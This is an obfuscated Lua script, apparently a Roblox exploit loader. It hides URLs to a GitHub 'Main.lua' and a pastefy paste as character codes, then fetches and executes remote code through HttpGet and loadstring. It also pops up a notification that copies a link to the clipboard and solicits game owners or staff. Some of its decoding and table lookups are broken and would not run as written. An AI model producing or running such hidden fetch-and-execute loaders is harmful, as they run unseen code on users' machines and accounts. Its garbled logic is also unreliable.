local __ = {
    ['\242'] = function(x) return loadstring(game:HttpGet(x))() end,
    ['\173'] = function(q)
        local o, l = {}, 1
        for i in q:gmatch('%d+') do
            o[l], l = string.char(i + 0), l + 1
        end
        return table.concat(o)
    end,
    ['\192'] = '104 116 116 112 115 58 47 47 114 97 119 46 103 105 116 104 117 98 117 115 101 114 99 111 110 116 101 110 116 46 99 111 109 47 85 114 98 97 110 115 116 111 114 109 109 47 80 114 111 106 101 99 116 45 83 116 97 114 107 47 109 97 105 110 47 77 97 105 110 46 108 117 97',
    ['\111'] = function(...)
        local a = {...}
        return a[1](a[2](a[3]))
    end,
    ['\255'] = '\242\173\192',
    ['\144'] = function(s)
        local r = {}
        for i = 1, #s do
            r[i] = string.char(s:byte(i) + 1)
        end
        return table.concat(r)
    end,
    ['\088'] = '103`ld9FdqRdquhbd-,Sq`qsdqFthBrshmr',
    ['\099'] = 'Rdmc@nnshehb`shnm',
    ['\077'] = 'Rbqhos+kn`cdc+`mc+`krn+he+tq+nvmdq+f`ld+nq+rs`ee+f`ld+sgdm+cl+ld+=%<,2408179194363634283=',
    ['\066'] = 'Roxt`qd+mn+sqtrs',
    ['\055'] = 'Xdr',
    ['\044'] = 'B`mbdk',
    ['\033'] = '503799',
    ['\022'] = 'gssornknm',
    ['\188'] = function(t, x, b, d, y1, y2, dur)
        local sg = game:GetService(__['\144'](__['\088']))
        local notify = sg[__['\144'](__['\099'])]
        
        notify('SendNotification', {
            Title = t,
            Text = x,
            Button1 = y1,
            Button2 = y2,
            Duration = dur,
            Callback = function(btn)
                if btn == y1 or btn == y2 then
                    setclipboard(b)
                end
            end
        })
    end,
    ['\233'] = '104 116 116 112 115 58 47 47 112 97 115 116 101 102 121 46 97 112 112 47 102 78 76 122 114 56 48 110 47 114 97 119',
    ['\211'] = function(c1, c2, c3, c4, c5, c6, c7)
        return c1(__['\173'](c2), __['\173'](c3), __['\173'](c4), __['\173'](c5), __['\173'](c6), __['\173'](c7), tonumber(__['\173'](__['\033'])))
    end
}

__['\211'](
    __['\188'],
    __['\077'],
    __['\066'],
    __['\233'],
    __['\055'],
    __['\044'],
    __['\033']
)

local ___ = {
    ['\101'] = function(u) return game:HttpGet(u) end,
    ['\102'] = function(c) return loadstring(c)() end,
    ['\103'] = function(s)
        local t = {}
        for i = 1, #s do
            t[i] = string.char(s:byte(i) - 3)
        end
        return table.concat(t)
    end,
    ['\104'] = '107 119 119 115 126 72 47 47 106 108 119 107 120 69 75 120 76 112 119 120 128 69 75 115 116 47 85 118 103 112 119 112 75 119 112 103 87 121 128 119 47 69 117 112 103 47 108 118 114 112 98 128 112 128 47 85 118 103 112 119 112 75 119 112 103 87 121 128 119 45 124 119 49 121 120 116 45 119 124 119',
    ['\105'] = function(...)
        local p = {...}
        return p[2](p[1](p[3]))
    end,
    ['\106'] = '\101\104\103'
}

___['\105'](___[___['\106']:byte(1)], ___[___['\106']:byte(2)], ___['\103'](___['\104']))
